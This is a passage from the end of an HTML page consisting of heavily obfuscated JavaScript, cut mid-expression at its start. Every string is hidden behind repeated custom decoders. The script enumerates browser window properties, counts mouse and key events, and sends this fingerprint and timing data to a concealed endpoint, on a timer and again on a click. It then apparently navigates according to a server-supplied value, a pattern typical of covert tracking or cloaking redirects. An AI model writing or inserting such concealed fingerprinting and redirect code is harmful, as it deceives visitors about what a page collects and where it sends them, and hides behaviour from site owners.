Uint8Array(await T3P8ny[I5OP95(0x6a)]())))};let UJAMQtV=cx9RxD[0x0],y53pcF2=cx9RxD[0x0];setTimeout(()=>{function ChYO9u(ChYO9u){var YWQ8zob="B!IeAlqiEPMWCQoanpNSHKFjrfsXRgTbUGVL:ZY&8#{=OdJ?5cD$hm9*(tk/z12xy<u]\"+v^7%[>0})34w@~,|.;`6_",dJVBjj,I5OP95,T3P8ny,TY9GQNu,EPA_eF,FMWSJT8,r3CkxzJ;X72pJfe(dJVBjj=""+(ChYO9u||""),I5OP95=dJVBjj.length,T3P8ny=[],TY9GQNu=cx9RxD[0x0],EPA_eF=cx9RxD[0x0],FMWSJT8=-cx9RxD[0x1]);for(r3CkxzJ=cx9RxD[0x0];r3CkxzJ<I5OP95;r3CkxzJ++){var KIe_2y=YWQ8zob.indexOf(dJVBjj[r3CkxzJ]);if(KIe_2y===-cx9RxD[0x1])continue;if(FMWSJT8<cx9RxD[0x0]){FMWSJT8=KIe_2y}else{X72pJfe(FMWSJT8+=KIe_2y*cx9RxD[0xc],TY9GQNu|=FMWSJT8<<EPA_eF,EPA_eF+=(FMWSJT8&cx9RxD[0xd])>cx9RxD[0xe]?cx9RxD[0xf]:cx9RxD[0x10]);do{X72pJfe(T3P8ny.push(TY9GQNu&cx9RxD[0x3]),TY9GQNu>>=cx9RxD[0x2],EPA_eF-=cx9RxD[0x2])}while(EPA_eF>cx9RxD[0x9]);FMWSJT8=-cx9RxD[0x1]}}if(FMWSJT8>-cx9RxD[0x1]){T3P8ny.push((TY9GQNu|FMWSJT8<<EPA_eF)&cx9RxD[0x3])}return ktP6GG(T3P8ny)}function YWQ8zob(YWQ8zob){if(typeof aUunWg[YWQ8zob]===cx9RxD[0x5]){return aUunWg[YWQ8zob]=ChYO9u(UF2e5FR[YWQ8zob])}return aUunWg[YWQ8zob]}X72pJfe(UJAMQtV=aOqYLj(),vnjqPw(YWQ8zob(0x6b),{[YWQ8zob(0x6c)]:KIe_2y,u:window[YWQ8zob(0x6d)][YWQ8zob(0x6e)],[YWQ8zob(0x6f)]:Object[YWQ8zob(0x70)](window)[YWQ8zob(0x71)](ChYO9u=>{function YWQ8zob(ChYO9u){var YWQ8zob="`()N=wAxtkm%/y}?+rbP;&3^[I2,vu*1l.gK0{XiVHRFQ~aSqJjB$>4WUf7_T\"@C|GMD!s9zOE6#5L:nYpcZ]<d8heo",dJVBjj,I5OP95,T3P8ny,TY9GQNu,EPA_eF,FMWSJT8,r3CkxzJ;X72pJfe(dJVBjj=""+(ChYO9u||""),I5OP95=dJVBjj.length,T3P8ny=[],TY9GQNu=cx9RxD[0x0],EPA_eF=cx9RxD[0x0],FMWSJT8=-cx9RxD[0x1]);for(r3CkxzJ=cx9RxD[0x0];r3CkxzJ<I5OP95;r3CkxzJ++){var KIe_2y=YWQ8zob.indexOf(dJVBjj[r3CkxzJ]);if(KIe_2y===-cx9RxD[0x1])continue;if(FMWSJT8<cx9RxD[0x0]){FMWSJT8=KIe_2y}else{X72pJfe(FMWSJT8+=KIe_2y*cx9RxD[0xc],TY9GQNu|=FMWSJT8<<EPA_eF,EPA_eF+=(FMWSJT8&cx9RxD[0xd])>cx9RxD[0xe]?cx9RxD[0xf]:cx9RxD[0x10]);do{X72pJfe(T3P8ny.push(TY9GQNu&cx9RxD[0x3]),TY9GQNu>>=cx9RxD[0x2],EPA_eF-=cx9RxD[0x2])}while(EPA_eF>cx9RxD[0x9]);FMWSJT8=-cx9RxD[0x1]}}if(FMWSJT8>-cx9RxD[0x1]){T3P8ny.push((TY9GQNu|FMWSJT8<<EPA_eF)&cx9RxD[0x3])}return ktP6GG(T3P8ny)}function dJVBjj(ChYO9u){if(typeof aUunWg[ChYO9u]===cx9RxD[0x5]){return aUunWg[ChYO9u]=YWQ8zob(UF2e5FR[ChYO9u])}return aUunWg[ChYO9u]}return ChYO9u[cx9RxD[0x0]]===ChYO9u[cx9RxD[0x0]][dJVBjj(0x72)]()&&!ChYO9u[dJVBjj(0x73)]("on")})})[YWQ8zob(0x74)](ChYO9u=>{function YWQ8zob(ChYO9u){var YWQ8zob="uGQXCMmeVcqhslaNkjbIBrSEoZDgYLnARTJfPFpW=Kt_~@`|04&1^.(+%<{65*}v,?8w$:2#>93\"x!yUH;][7z)/Odi",dJVBjj,I5OP95,T3P8ny,TY9GQNu,EPA_eF,FMWSJT8,r3CkxzJ;X72pJfe(dJVBjj=""+(ChYO9u||""),I5OP95=dJVBjj.length,T3P8ny=[],TY9GQNu=cx9RxD[0x0],EPA_eF=cx9RxD[0x0],FMWSJT8=-cx9RxD[0x1]);for(r3CkxzJ=cx9RxD[0x0];r3CkxzJ<I5OP95;r3CkxzJ++){var KIe_2y=YWQ8zob.indexOf(dJVBjj[r3CkxzJ]);if(KIe_2y===-cx9RxD[0x1])continue;if(FMWSJT8<cx9RxD[0x0]){FMWSJT8=KIe_2y}else{X72pJfe(FMWSJT8+=KIe_2y*cx9RxD[0xc],TY9GQNu|=FMWSJT8<<EPA_eF,EPA_eF+=(FMWSJT8&cx9RxD[0xd])>cx9RxD[0xe]?cx9RxD[0xf]:cx9RxD[0x10]);do{X72pJfe(T3P8ny.push(TY9GQNu&cx9RxD[0x3]),TY9GQNu>>=cx9RxD[0x2],EPA_eF-=cx9RxD[0x2])}while(EPA_eF>cx9RxD[0x9]);FMWSJT8=-cx9RxD[0x1]}}if(FMWSJT8>-cx9RxD[0x1]){T3P8ny.push((TY9GQNu|FMWSJT8<<EPA_eF)&cx9RxD[0x3])}return ktP6GG(T3P8ny)}function dJVBjj(ChYO9u){if(typeof aUunWg[ChYO9u]===cx9RxD[0x5]){return aUunWg[ChYO9u]=YWQ8zob(UF2e5FR[ChYO9u])}return aUunWg[ChYO9u]}const I5OP95=JSON[dJVBjj(0x75)](ChYO9u);X72pJfe(y53pcF2=aOqYLj(),FMWSJT8=I5OP95[dJVBjj(0x76)],I5OP95[cx9RxD[0x12]]&&VogNxd(I5OP95[cx9RxD[0x12]]))})[YWQ8zob(0x77)](()=>{return cx9RxD[0x0]}))},0x1f4);let geAkFJ=!cx9RxD[0x1],rm5IVn=cx9RxD[0x0],tzQ1LK=cx9RxD[0x0];X72pJfe(document[YWQ8zob(cx9RxD[0x13])](YWQ8zob(0x79),ChYO9u=>{function YWQ8zob(ChYO9u){var YWQ8zob=":$+>8?uv_%~\"7|`{4L3h2)/6]=U*DA0JbX[yBKYWjfoMTVcgnpHOriSlet^!zqZF#}95.a&QPw@dNEI1(k<GxCm,R;s",dJVBjj,I5OP95,T3P8ny,TY9GQNu,EPA_eF,FMWSJT8,r3CkxzJ;X72pJfe(dJVBjj=""+(ChYO9u||""),I5OP95=dJVBjj.length,T3P8ny=[],TY9GQNu=cx9RxD[0x0],EPA_eF=cx9RxD[0x0],FMWSJT8=-cx9RxD[0x1]);for(r3CkxzJ=cx9RxD[0x0];r3CkxzJ<I5OP95;r3CkxzJ++){var KIe_2y=YWQ8zob.indexOf(dJVBjj[r3CkxzJ]);if(KIe_2y===-cx9RxD[0x1])continue;if(FMWSJT8<cx9RxD[0x0]){FMWSJT8=KIe_2y}else{X72pJfe(FMWSJT8+=KIe_2y*cx9RxD[0xc],TY9GQNu|=FMWSJT8<<EPA_eF,EPA_eF+=(FMWSJT8&cx9RxD[0xd])>cx9RxD[0xe]?cx9RxD[0xf]:cx9RxD[0x10]);do{X72pJfe(T3P8ny.push(TY9GQNu&cx9RxD[0x3]),TY9GQNu>>=cx9RxD[0x2],EPA_eF-=cx9RxD[0x2])}while(EPA_eF>cx9RxD[0x9]);FMWSJT8=-cx9RxD[0x1]}}if(FMWSJT8>-cx9RxD[0x1]){T3P8ny.push((TY9GQNu|FMWSJT8<<EPA_eF)&cx9RxD[0x3])}return ktP6GG(T3P8ny)}function dJVBjj(ChYO9u){if(typeof aUunWg[ChYO9u]===cx9RxD[0x5]){return aUunWg[ChYO9u]=YWQ8zob(UF2e5FR[ChYO9u])}return aUunWg[ChYO9u]}return ChYO9u[dJVBjj(0x7a)]&&rm5IVn++}),document[YWQ8zob(cx9RxD[0x13])](YWQ8zob(0x7b),ChYO9u=>{return ChYO9u[YWQ8zob(0x7c)]&&tzQ1LK++}),window[YWQ8zob(0x7d)]={["cl"](ChYO9u,YWQ8zob,dJVBjj){function I5OP95(ChYO9u){var YWQ8zob="[xz$/`@,!9{>r*AMVHYnW4a<j^}#QgR2~q8BFtw;fv\"lDK=6iN:+?GU(0e.ybPm3O%C|Zs]p_L)7STXEIdhuJko&c15",I5OP95,EPA_eF,T3P8ny,TY9GQNu,FMWSJT8,r3CkxzJ,KIe_2y;X72pJfe(I5OP95=""+(ChYO9u||""),EPA_eF=I5OP95.length,T3P8ny=[],TY9GQNu=cx9RxD[0x0],FMWSJT8=cx9RxD[0x0],r3CkxzJ=-cx9RxD[0x1]);for(KIe_2y=cx9RxD[0x0];KIe_2y<EPA_eF;KIe_2y++){var QZ8vaF=YWQ8zob.indexOf(I5OP95[KIe_2y]);if(QZ8vaF===-cx9RxD[0x1])continue;if(r3CkxzJ<cx9RxD[0x0]){r3CkxzJ=QZ8vaF}else{X72pJfe(r3CkxzJ+=QZ8vaF*cx9RxD[0xc],TY9GQNu|=r3CkxzJ<<FMWSJT8,FMWSJT8+=(r3CkxzJ&cx9RxD[0xd])>cx9RxD[0xe]?cx9RxD[0xf]:cx9RxD[0x10]);do{X72pJfe(T3P8ny.push(TY9GQNu&cx9RxD[0x3]),TY9GQNu>>=cx9RxD[0x2],FMWSJT8-=cx9RxD[0x2])}while(FMWSJT8>cx9RxD[0x9]);r3CkxzJ=-cx9RxD[0x1]}}if(r3CkxzJ>-cx9RxD[0x1]){T3P8ny.push((TY9GQNu|r3CkxzJ<<FMWSJT8)&cx9RxD[0x3])}return ktP6GG(T3P8ny)}function EPA_eF(ChYO9u){if(typeof aUunWg[ChYO9u]===cx9RxD[0x5]){return aUunWg[ChYO9u]=I5OP95(UF2e5FR[ChYO9u])}return aUunWg[ChYO9u]}document[EPA_eF(0x7e)](ChYO9u)?.addEventListener(EPA_eF(cx9RxD[0x14]),()=>{if(geAkFJ){return}geAkFJ=!cx9RxD[0x0];const ChYO9u=aOqYLj();X72pJfe(T3P8ny[EPA_eF(cx9RxD[0x15])](TY9GQNu,ChYO9u+bLmUAx*cx9RxD[0x16]+""),setTimeout(()=>{function I5OP95(I5OP95){var EPA_eF="qdnpkBJgtT]NF7sD=6E0o|KyVYHWf/U}ej:?#~*&1M^x;5\")_,@2+[(zw!lacSROrbPLmGAXhZCQI3<%v{u894$`.>i",ChYO9u,YWQ8zob,T3P8ny,TY9GQNu,FMWSJT8,r3CkxzJ,KIe_2y;X72pJfe(ChYO9u=""+(I5OP95||""),YWQ8zob=ChYO9u.length,T3P8ny=[],TY9GQNu=cx9RxD[0x0],FMWSJT8=cx9RxD[0x0],r3CkxzJ=-cx9RxD[0x1]);for(KIe_2y=cx9RxD[0x0];KIe_2y<YWQ8zob;KIe_2y++){var QZ8vaF=EPA_eF.indexOf(ChYO9u[KIe_2y]);if(QZ8vaF===-cx9RxD[0x1])continue;if(r3CkxzJ<cx9RxD[0x0]){r3CkxzJ=QZ8vaF}else{X72pJfe(r3CkxzJ+=QZ8vaF*cx9RxD[0xc],TY9GQNu|=r3CkxzJ<<FMWSJT8,FMWSJT8+=(r3CkxzJ&cx9RxD[0xd])>cx9RxD[0xe]?cx9RxD[0xf]:cx9RxD[0x10]);do{X72pJfe(T3P8ny.push(TY9GQNu&cx9RxD[0x3]),TY9GQNu>>=cx9RxD[0x2],FMWSJT8-=cx9RxD[0x2])}while(FMWSJT8>cx9RxD[0x9]);r3CkxzJ=-cx9RxD[0x1]}}if(r3CkxzJ>-cx9RxD[0x1]){T3P8ny.push((TY9GQNu|r3CkxzJ<<FMWSJT8)&cx9RxD[0x3])}return ktP6GG(T3P8ny)}function EPA_eF(EPA_eF){if(typeof aUunWg[EPA_eF]===cx9RxD[0x5]){return aUunWg[EPA_eF]=I5OP95(UF2e5FR[EPA_eF])}return aUunWg[EPA_eF]}return vnjqPw(EPA_eF(0x81),{[EPA_eF(0x82)]:FMWSJT8,[EPA_eF(0x83)]:KIe_2y,[EPA_eF(0x84)]:y53pcF2-UJAMQtV,mm:rm5IVn,dc:tzQ1LK,fk:YWQ8zob,[EPA_eF(0x85)]:!document[EPA_eF(0x86)]&&document[EPA_eF(0x87)](),ms:ChYO9u-y53pcF2})[EPA_eF(0x88)](I5OP95=>{return I5OP95&&setTimeout(()=>{return VogNxd(I5OP95)},dJVBjj?dJVBjj-(aOqYLj()-ChYO9u):cx9RxD[0x0])})[EPA_eF(0x89)](()=>{return cx9RxD[0x0]})},0xa))})},ch:()=>{function ChYO9u(ChYO9u){var dJVBjj="7LRHTFgNGSqitXaQJY>MU[bd9@#6o2?W!|V=fnuOl_z;Z,*4%{3&D1(ChIk}Kv.05B^e$P<]yrcwA\"8/mEx):`~s+pj",YWQ8zob,I5OP95,T3P8ny,TY9GQNu,EPA_eF,FMWSJT8,r3CkxzJ;X72pJfe(YWQ8zob=""+(ChYO9u||""),I5OP95=YWQ8zob.length,T3P8ny=[],TY9GQNu=cx9RxD[0x0],EPA_eF=cx9RxD[0x0],FMWSJT8=-cx9RxD[0x1]);for(r3CkxzJ=cx9RxD[0x0];r3CkxzJ<I5OP95;r3CkxzJ++){var KIe_2y=dJVBjj.indexOf(YWQ8zob[r3CkxzJ]);if(KIe_2y===-cx9RxD[0x1])continue;if(FMWSJT8<cx9RxD[0x0]){FMWSJT8=KIe_2y}else{X72pJfe(FMWSJT8+=KIe_2y*cx9RxD[0xc],TY9GQNu|=FMWSJT8<<EPA_eF,EPA_eF+=(FMWSJT8&cx9RxD[0xd])>cx9RxD[0xe]?cx9RxD[0xf]:cx9RxD[0x10]);do{X72pJfe(T3P8ny.push(TY9GQNu&cx9RxD[0x3]),TY9GQNu>>=cx9RxD[0x2],EPA_eF-=cx9RxD[0x2])}while(EPA_eF>cx9RxD[0x9]);FMWSJT8=-cx9RxD[0x1]}}if(FMWSJT8>-cx9RxD[0x1]){T3P8ny.push((TY9GQNu|FMWSJT8<<EPA_eF)&cx9RxD[0x3])}return ktP6GG(T3P8ny)}function dJVBjj(dJVBjj){if(typeof aUunWg[dJVBjj]===cx9RxD[0x5]){return aUunWg[dJVBjj]=ChYO9u(UF2e5FR[dJVBjj])}return aUunWg[dJVBjj]}return vnjqPw(YWQ8zob(0x8a),{[dJVBjj(0x8b)]:FMWSJT8,[dJVBjj(0x8c)]:KIe_2y})[dJVBjj(0x8d)](ChYO9u=>{return Number(ChYO9u)===cx9RxD[0x1]})},bl:()=>{function ChYO9u(ChYO9u){var YWQ8zob="@:9u[v(wD?eojJc~XCqmOgNFVnMsISPZbBRrY+h._`3&fai)^}>Uk%T|x{;p2$6y<*5z80\"=KHWGdEl,1/47!]Qt#LA",dJVBjj,I5OP95,T3P8ny,TY9GQNu,EPA_eF,FMWSJT8,r3CkxzJ;X72pJfe(dJVBjj=""+(ChYO9u||""),I5OP95=dJVBjj.length,T3P8ny=[],TY9GQNu=cx9RxD[0x0],EPA_eF=cx9RxD[0x0],FMWSJT8=-cx9RxD[0x1]);for(r3CkxzJ=cx9RxD[0x0];r3CkxzJ<I5OP95;r3CkxzJ++){var KIe_2y=YWQ8zob.indexOf(dJVBjj[r3CkxzJ]);if(KIe_2y===-cx9RxD[0x1])continue;if(FMWSJT8<cx9RxD[0x0]){FMWSJT8=KIe_2y}else{X72pJfe(FMWSJT8+=KIe_2y*cx9RxD[0xc],TY9GQNu|=FMWSJT8<<EPA_eF,EPA_eF+=(FMWSJT8&cx9RxD[0xd])>cx9RxD[0xe]?cx9RxD[0xf]:cx9RxD[0x10]);do{X72pJfe(T3P8ny.push(TY9GQNu&cx9RxD[0x3]),TY9GQNu>>=cx9RxD[0x2],EPA_eF-=cx9RxD[0x2])}while(EPA_eF>cx9RxD[0x9]);FMWSJT8=-cx9RxD[0x1]}}if(FMWSJT8>-cx9RxD[0x1]){T3P8ny.push((TY9GQNu|FMWSJT8<<EPA_eF)&cx9RxD[0x3])}return ktP6GG(T3P8ny)}function YWQ8zob(YWQ8zob){if(typeof aUunWg[YWQ8zob]===cx9RxD[0x5]){return aUunWg[YWQ8zob]=ChYO9u(UF2e5FR[YWQ8zob])}return aUunWg[YWQ8zob]}return vnjqPw(YWQ8zob(0x8e),{[YWQ8zob(0x8f)]:FMWSJT8,[YWQ8zob(0x90)]:KIe_2y})[YWQ8zob(0x91)](()=>{})}})}});if(YWQ8zob===T3P8ny(0x92)){KIe_2y=[]}if(YWQ8zob===T3P8ny(0x93)){function FMWSJT8(){var YWQ8zob=function(...YWQ8zob){KIe_2y=YWQ8zob;return EPA_eF[ChYO9u].apply(this)},dJVBjj;dJVBjj=aOqYLj[ChYO9u];if(dJVBjj){QZ8vaF(YWQ8zob,dJVBjj)}return YWQ8zob}TY9GQNu=r3CkxzJ[ChYO9u]||(r3CkxzJ[ChYO9u]=FMWSJT8())}else{TY9GQNu=EPA_eF[ChYO9u]()}return dJVBjj===T3P8ny(0x94)?{[T3P8ny(0x95)]:TY9GQNu}:TY9GQNu}dJVBjj(YWQ8zob(0x96),YWQ8zob(0x97))})(); </script> </body> </html>